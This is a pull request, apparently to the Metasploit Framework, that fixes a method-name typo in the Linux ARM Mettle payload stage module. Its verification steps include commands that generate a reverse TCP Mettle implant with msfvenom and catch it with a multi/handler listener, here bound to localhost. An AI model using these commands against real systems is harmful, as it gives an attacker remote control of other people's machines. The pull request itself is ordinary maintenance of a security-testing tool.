### PR TITLE
Fix typo in payloads/linux/armle/mettle

### DIFF
--- a/modules/payloads/stages/linux/armle/mettle.rb
+++ b/modules/payloads/stages/linux/armle/mettle.rb
@@ -82,6 +82,6 @@ module MetasploitModule
   def generate_stage(opts = {})
     opts[:uuid] ||= generate_payload_uuid
     MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', opts.slice(:uuid, :url, :debug, :log_file)).
-      to_bininary :process_image
+      to_binary :process_image
   end
 end


### PR DESCRIPTION
Fix a dumb typo introduced when I converted to the new mettle gem API in a79f860c

Verification
========
- [x] `./msfvenom -p linux/armle/mettle/reverse_tcp -f elf -o stageme.arm LHOST=127.0.0.1`
- [x] `./msfconsole -qx 'use exploit/multi/handler; set payload linux/armle/mettle/reverse_tcp; set lhost 127.0.0.1; run'`
- [x] Run `qemu-arm ./stageme.arm` (requires user-mode qemu)
- [x] Verify the payload stages and runs